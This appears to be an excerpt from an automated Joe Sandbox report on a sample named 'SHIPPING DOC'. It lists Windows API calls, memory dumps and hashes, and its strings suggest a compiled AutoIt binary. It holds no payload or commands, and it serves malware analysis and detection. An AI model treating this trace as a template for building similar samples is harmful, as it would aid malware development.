                                                                                                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1582027408-0
                                                                                                                      • Opcode ID: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                                                                                                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                      • Opcode Fuzzy Hash: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                                                                                                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseConnectCreateRegistry
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 3217815495-966354055
                                                                                                                      • Opcode ID: cc51306d31ed6c8e05796ddcf504f705dab8229ec76f85ad91dfb98ceec273a0
                                                                                                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                      • Opcode Fuzzy Hash: cc51306d31ed6c8e05796ddcf504f705dab8229ec76f85ad91dfb98ceec273a0
                                                                                                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                      • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                      • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                      • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                      • String ID: ($,$tooltips_class32
                                                                                                                      • API String ID: 225202481-3320066284
                                                                                                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 15083398-0
                                                                                                                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                      • String ID: @$AutoIt v3 GUI
                                                                                                                      • API String ID: 867697134-3359773793
                                                                                                                      • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                                                                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                      • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                                                                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                      • API String ID: 1503153545-1459072770
                                                                                                                      • Opcode ID: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                                                                                                                      • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                      • Opcode Fuzzy Hash: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                                                                                                                      • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$__wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                      • API String ID: 790654849-32604322
                                                                                                                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                                                                                                                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                      • Opcode Fuzzy Hash: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                                                                                                                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                      • _fseek.LIBCMT ref: 00452B3B
                                                                                                                      • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                      • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                      • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                      • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                      • _wcscat.LIBCMT ref: 00452C07
                                                                                                                      • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2054058615-0
                                                                                                                      • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                      • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                      • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                      • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2353593579-4108050209
                                                                                                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1744303182-0
                                                                                                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                      • __mtterm.LIBCMT ref: 00417C34
                                                                                                                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
